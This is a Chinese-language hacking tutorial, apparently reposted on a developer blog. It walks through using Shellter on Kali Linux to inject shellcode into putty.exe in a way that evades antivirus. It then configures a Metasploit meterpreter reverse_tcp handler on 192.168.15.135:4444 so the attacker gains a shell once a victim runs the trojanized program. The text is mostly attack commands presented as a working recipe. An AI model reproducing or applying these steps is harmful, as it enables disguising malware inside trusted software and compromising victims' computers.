Shellter是一个 shellcode 注入工具。它有效地重新编码有效负载(此处为外壳代码)以绕过防病毒(AV)软件。Shellter已被证明是Windows 32位应用程序的PE(可移植可执行文件)文件格式的第一个动态感染者。要使用Shellter,您可以创建自己的shellcode,也可以从Metasploit等框架中创建一个shellcode。Shellter 嵌入了一个 32 位 Windows 应用程序和 shellcode。
安装
在kali Linux中我们可以利用下面命令直接安装
代码语言:javascript复制apt-get install shellter
接下来,我们需要安装wine32环境。
apt-get intall wine32运行Shellter
在终端执行命令Shellter
Shellter时,它会提示您选择操作模式。
选择模式为a。
现在,您需要选择一个可执行文件并将其复制到Shellter文件夹。要将 Shellter 与.exe文件绑定,需要执行此操作。在这里我们以putty.exe为列。
当系统要求您输入 PE 目标时,请键入以下命令:
代码语言:javascript复制/root/Downloads/putty.exe在经过一番复杂的编码加密注入后,下面要求我们选择一种 payload 或 自定义使用 payload ,这里我选择 L 并选择列表中的 1 :
set LHOST :192.168.15.135
set LPORT :4444当我们回车后,shellter 就会自动帮我们生成 shellcode 并自动退出程序。我们在当前目录下 使用 ls -l 命令进行查看,可以看到 putty.exe 已被成功注入:
接着我们在 kali 上启动 MSF,配置反弹会话的 handler :
代码语言:javascript复制use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.15.135
set port 4444
exploit此时只要当目标成功运行,经我们注入的 shellcode 程序,我们就能取得目标的 shell !
版权属于:逍遥子大表哥
本文链接:https://cloud.tencent.com/developer/article/2092321
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
